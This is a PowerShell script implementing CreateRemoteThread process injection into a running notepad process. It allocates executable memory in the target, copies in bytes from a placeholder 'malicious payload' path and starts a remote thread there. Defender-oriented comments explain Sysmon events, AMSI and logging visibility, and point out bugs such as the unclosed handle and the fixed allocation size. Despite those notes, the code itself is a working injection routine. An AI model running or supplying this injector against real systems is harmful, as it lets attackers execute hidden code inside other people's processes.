# Despite the file's name, nothing below hollows a process (there is no suspended
# process creation and no section unmapping): this is the classic four-call
# CreateRemoteThread injection sequence, OpenProcess -> VirtualAllocEx ->
# WriteProcessMemory -> CreateRemoteThread, driven from PowerShell.
#
# Defender notes:
#  - Add-Type compiles the C# here-string at run time; with script block logging
#    enabled the whole definition lands in the PowerShell 4104 event, and AMSI sees
#    the script text before it runs.
#  - Sysmon Event ID 10 (ProcessAccess) records the OpenProcess call, and Event ID 8
#    (CreateRemoteThread) records the remote thread; a PowerShell host touching another
#    process with those two APIs is a high-signal pairing.
#
# Defines the P/Invoke wrapper type [kernel32.Win32] with four kernel32 exports.
# The here-string is passed to Add-Type verbatim (it is C#, not PowerShell).
Add-Type -Namespace "kernel32" -Name "Win32" -MemberDefinition @"
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
# Target selection is by image name only; $targetProcessId is whatever Get-Process
# returns for "notepad" at that moment.
$targetProcessId = Get-Process -Name "notepad" | Select-Object -ExpandProperty Id
# Placeholder path; the file at this path is read as raw bytes below.
$payloadPath = "C:\path\to\your\malicious\payload.exe"
# 0x1F0FFF is PROCESS_ALL_ACCESS. Requesting full access on another process is the
# ProcessAccess event most EDR rules key on; the returned handle is not checked here.
$hProcess = [kernel32.Win32]::OpenProcess(0x1F0FFF, $false, $targetProcessId)
# Remote allocation of a fixed 0x1000 bytes: 0x3000 is MEM_COMMIT | MEM_RESERVE and
# 0x40 is PAGE_EXECUTE_READWRITE. An RWX region allocated in a foreign process is by
# itself a common memory-scanner indicator.
$allocatedMemory = [kernel32.Win32]::VirtualAllocEx($hProcess, [IntPtr]::Zero, 0x1000, 0x3000, 0x40)
# Write payload to allocated memory
$payload = [System.IO.File]::ReadAllBytes($payloadPath)
$bytesWritten = 0
# Copies the raw file bytes into the remote region; the bool result is not inspected.
[kernel32.Win32]::WriteProcessMemory($hProcess, $allocatedMemory, $payload, $payload.Length, [ref]$bytesWritten)
# One-second pause before the thread is started.
[thread]::Sleep(1000)
# Starts a thread in the target at the allocated address (Sysmon Event ID 8).
[kernel32.Win32]::CreateRemoteThread($hProcess, [IntPtr]::Zero, 0, $allocatedMemory, [IntPtr]::Zero, 0, [IntPtr]::Zero)
# The null-handle check happens only after the handle has already been used above.
# Marshal.Release is the COM IUnknown release, not CloseHandle, so this does not
# actually close the process handle.
if ($hProcess -ne [IntPtr]::Zero) {
[System.Runtime.InteropServices.Marshal]::Release($hProcess)
}